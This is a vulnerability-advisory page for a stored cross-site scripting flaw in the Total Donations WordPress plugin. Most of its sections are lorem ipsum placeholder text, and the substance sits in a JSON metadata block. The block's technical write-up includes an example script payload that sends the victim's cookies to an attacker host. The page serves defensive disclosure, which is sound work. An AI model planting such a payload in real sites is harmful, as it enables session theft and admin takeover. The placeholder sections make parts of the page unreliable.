Sceawere
Vulnerability Detail
CVE-2026-94159UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV
Total Donations Stored XSS
Vulnerability Metadata
- Severity
- High
- Score / CVSS
- 7.1
- Creation Date
- 3h ago
- Vendor
- KlbTheme
- Product
- Total Donations
- Attack Type
- Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- Vector String
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
- Attack Complexity
- LOW
Narrative and Response
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KlbTheme Total Donations totaldonations allows Stored XSS.This issue affects Total Donations: from n/a through 2.0.5.
Executive Summary
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Technical Details
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Mitigations
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
References
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Additional Metadata
{
"score": "7.1",
"pubDate": "2026-10-09T10:16:39.787Z",
"pubdate": "2026-10-09T10:16:39.787Z",
"executiveSummary": "The Total Donations plugin for WordPress, developed by KlbTheme, is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability.\nThis flaw, affecting all versions from n/a through 2.0.5, originates from improper neutralization of user-supplied input during web page generation.\nAn unauthenticated or authenticated attacker capable of submitting data to the plugin can inject malicious scripts into the application's database.\nThese scripts are subsequently executed within the context of an administrator's or other user's browser session when they interact with the affected dashboard or front-end pages.\nThe impact includes the potential for session hijacking, unauthorized actions performed on behalf of the victim, and the defacement or manipulation of web page content.\nThe risk is critical due to the potential for administrative account compromise, which could lead to full site takeover.\nExploitation requires no complex interaction other than the attacker successfully injecting a malicious payload that the application fails to sanitize before rendering.\nOrganizations using this plugin are at risk of secondary attacks targeting their administrative personnel and users.",
"technicalDetails": "The vulnerability is a classic Stored Cross-Site Scripting (XSS) flaw occurring due to the inadequate validation and sanitization of input fields handled by the Total Donations plugin.\nThe root cause lies in the application's failure to properly neutralize user-provided data before storing it in the database and subsequently reflecting it back to users in administrative or public-facing interfaces.\nWhen a user submits data through the plugin's input vectors, the application stores the raw string directly into the database. If the plugin fails to implement sufficient output encoding or context-aware sanitization when displaying this data, an attacker can supply a malicious JavaScript payload.\nThe attack flow proceeds as follows: First, the attacker identifies a form field or parameter processed by the Total Donations plugin that is reflected in the administrative dashboard or a front-end view. Second, the attacker crafts a payload containing executable JavaScript, such as '<script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>', and submits it through the vulnerable input vector. Third, the malicious payload is persisted in the database. Finally, whenever a victim—such as an administrative user—views the page where the unsanitized input is rendered, the browser interprets the payload as legitimate script code and executes it within the victim's security context.\nBecause the payload executes in the context of the victim's session, the attacker can leverage the victim's privileges to perform unauthorized administrative actions, such as creating new user accounts, modifying plugin settings, or installing malicious modules.\nFurthermore, the attacker can hijack active session cookies, bypass CSRF protections, or redirect users to malicious domains. The vulnerability persists across page refreshes because the payload is stored permanently in the database until manually removed or until the plugin is updated to address the underlying lack of sanitization.\nThe lack of strict input validation allows arbitrary HTML tags and script blocks to be accepted. By failing to use secure WordPress APIs for output escaping (such as esc_html(), esc_attr(), or wp_kses()), the plugin leaves the DOM vulnerable to injection attacks.\nThis vulnerability affects all versions of the Total Donations plugin from n/a through 2.0.5, indicating a widespread failure in secure coding practices regarding user data handling."
}